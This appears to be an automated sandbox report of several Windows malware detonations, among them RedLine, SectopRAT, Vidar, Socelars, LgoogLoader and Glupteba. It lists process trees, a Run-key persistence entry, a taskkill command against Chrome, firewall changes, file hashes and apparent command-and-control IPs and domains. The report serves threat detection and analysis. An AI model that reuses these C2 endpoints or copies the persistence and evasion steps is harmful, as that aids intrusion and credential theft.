memory/2848-7-0x00007FFEE6C30000-0x00007FFEE76F1000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win10v2004-20241007-en
Max time kernel
131s
Max time network
148s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4640 set thread context of 1852 | N/A | C:\Users\Admin\AppData\Local\Temp\NAN.exe | C:\Users\Admin\AppData\Local\Temp\NAN.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\NAN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\NAN.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\NAN.exe
"C:\Users\Admin\AppData\Local\Temp\NAN.exe"
C:\Users\Admin\AppData\Local\Temp\NAN.exe
C:\Users\Admin\AppData\Local\Temp\NAN.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 87.251.71.14:89 | tcp | |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| RU | 87.251.71.14:89 | tcp | |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| RU | 87.251.71.14:89 | tcp | |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| RU | 87.251.71.14:89 | tcp | |
| RU | 87.251.71.14:89 | tcp | |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| RU | 87.251.71.14:89 | tcp | |
| RU | 87.251.71.14:89 | tcp |
Files
memory/4640-0-0x000000007483E000-0x000000007483F000-memory.dmp
memory/4640-1-0x0000000000D10000-0x0000000000DAE000-memory.dmp
memory/4640-2-0x0000000005730000-0x00000000057A6000-memory.dmp
memory/4640-3-0x00000000056D0000-0x00000000056EE000-memory.dmp
memory/4640-4-0x0000000074830000-0x0000000074FE0000-memory.dmp
memory/4640-5-0x0000000005E00000-0x00000000063A4000-memory.dmp
memory/1852-6-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NAN.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/4640-9-0x0000000074830000-0x0000000074FE0000-memory.dmp
memory/1852-11-0x0000000002C60000-0x0000000002C72000-memory.dmp
memory/1852-12-0x0000000074830000-0x0000000074FE0000-memory.dmp
memory/1852-10-0x00000000056F0000-0x0000000005D08000-memory.dmp
memory/1852-13-0x0000000005220000-0x000000000532A000-memory.dmp
memory/1852-14-0x0000000074830000-0x0000000074FE0000-memory.dmp
memory/1852-15-0x0000000005150000-0x000000000518C000-memory.dmp
memory/1852-16-0x0000000005190000-0x00000000051DC000-memory.dmp
memory/1852-17-0x0000000074830000-0x0000000074FE0000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
137s
Command Line
Signatures
Detects LgoogLoader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
LgoogLoader
Lgoogloader family
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\inst002.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\qydBuSyJtmSmHNNaqr\xSAqdS | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2332 set thread context of 3836 | N/A | C:\Users\Admin\AppData\Local\Temp\inst002.exe | C:\Users\Admin\AppData\Local\Temp\qydBuSyJtmSmHNNaqr\xSAqdS |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\qydBuSyJtmSmHNNaqr\xSAqdS |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\inst002.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\qydBuSyJtmSmHNNaqr\xSAqdS | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\inst002.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\inst002.exe
"C:\Users\Admin\AppData\Local\Temp\inst002.exe"
C:\Users\Admin\AppData\Local\Temp\qydBuSyJtmSmHNNaqr\xSAqdS
C:\Users\Admin\AppData\Local\Temp\qydBuSyJtmSmHNNaqr\xSAqdS
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3836 -ip 3836
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3836 -s 472
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
Files
memory/2332-0-0x0000000001110000-0x0000000001120000-memory.dmp
memory/2332-1-0x0000000002D00000-0x0000000002D12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\qydBuSyJtmSmHNNaqr\xSAqdS
| MD5 | 9dabbd84d79a0330f7635748177a2d93 |
| SHA1 | 73a4e520d772e4260651cb20b61ba4cb9a29635a |
| SHA256 | a6e4be06d34448f4efa8655a3ae6e294c98ae4cb42f7c3da3be06b419fa8389d |
| SHA512 | 020114ba08ccb7ad7934e2046d2b61ebd1b006b8c31194f2cfb49ff4397f4db35dc67c8191552346d04709dee4871a13797cf284ef543e7280bc390a6746a314 |
memory/3836-8-0x0000000000010000-0x000000000005E000-memory.dmp
memory/2332-11-0x00000000009B0000-0x00000000009FE000-memory.dmp
memory/2332-12-0x0000000002D00000-0x0000000002D12000-memory.dmp
memory/3836-10-0x0000000000010000-0x000000000005E000-memory.dmp
memory/3836-4-0x0000000000010000-0x000000000005E000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win7-20241023-en
Max time kernel
121s
Max time network
123s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\jamesnew.exe
"C:\Users\Admin\AppData\Local\Temp\jamesnew.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bbaser2.webtm.ru | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win7-20240903-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Vidar
Vidar family
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Litever01.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Litever01.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\Litever01.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\Litever01.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\Litever01.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1248 wrote to memory of 1812 | N/A | C:\Users\Admin\AppData\Local\Temp\Litever01.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 1248 wrote to memory of 1812 | N/A | C:\Users\Admin\AppData\Local\Temp\Litever01.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 1248 wrote to memory of 1812 | N/A | C:\Users\Admin\AppData\Local\Temp\Litever01.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 1248 wrote to memory of 1812 | N/A | C:\Users\Admin\AppData\Local\Temp\Litever01.exe | C:\Windows\SysWOW64\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Litever01.exe
"C:\Users\Admin\AppData\Local\Temp\Litever01.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 856
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | eduarroma.tumblr.com | udp |
| US | 74.114.154.22:443 | eduarroma.tumblr.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
Files
memory/1248-1-0x0000000001F30000-0x0000000002030000-memory.dmp
memory/1248-2-0x0000000000220000-0x00000000002BD000-memory.dmp
memory/1248-3-0x0000000000400000-0x00000000004A1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabC850.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarC882.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/1248-60-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/1248-59-0x0000000001F30000-0x0000000002030000-memory.dmp
memory/1248-58-0x0000000000220000-0x00000000002BD000-memory.dmp
memory/1248-57-0x0000000000400000-0x0000000001DCA000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win7-20241010-en
Max time kernel
121s
Max time network
126s
Command Line
Signatures
Socelars
Socelars family
Reads user/profile data of web browsers
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up geolocation information via web service
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\askinstall50.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2904 wrote to memory of 2700 | N/A | C:\Users\Admin\AppData\Local\Temp\askinstall50.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2904 wrote to memory of 2700 | N/A | C:\Users\Admin\AppData\Local\Temp\askinstall50.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2904 wrote to memory of 2700 | N/A | C:\Users\Admin\AppData\Local\Temp\askinstall50.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2904 wrote to memory of 2700 | N/A | C:\Users\Admin\AppData\Local\Temp\askinstall50.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2700 wrote to memory of 2932 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\taskkill.exe |
| PID 2700 wrote to memory of 2932 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\taskkill.exe |
| PID 2700 wrote to memory of 2932 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\taskkill.exe |
| PID 2700 wrote to memory of 2932 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\taskkill.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\askinstall50.exe
"C:\Users\Admin\AppData\Local\Temp\askinstall50.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.195:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
Files
Analysis: behavioral29
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win7-20241010-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\redcloud.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\redcloud.exe
"C:\Users\Admin\AppData\Local\Temp\redcloud.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp |
Files
memory/432-0-0x00000000749AE000-0x00000000749AF000-memory.dmp
memory/432-1-0x0000000000F40000-0x0000000000F70000-memory.dmp
memory/432-2-0x00000000749A0000-0x000000007508E000-memory.dmp
memory/432-3-0x00000000749AE000-0x00000000749AF000-memory.dmp
memory/432-4-0x00000000749A0000-0x000000007508E000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Glupteba
Glupteba family
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
Metasploit family
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DryWind = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Checks installed software on the system
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rss\csrss.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
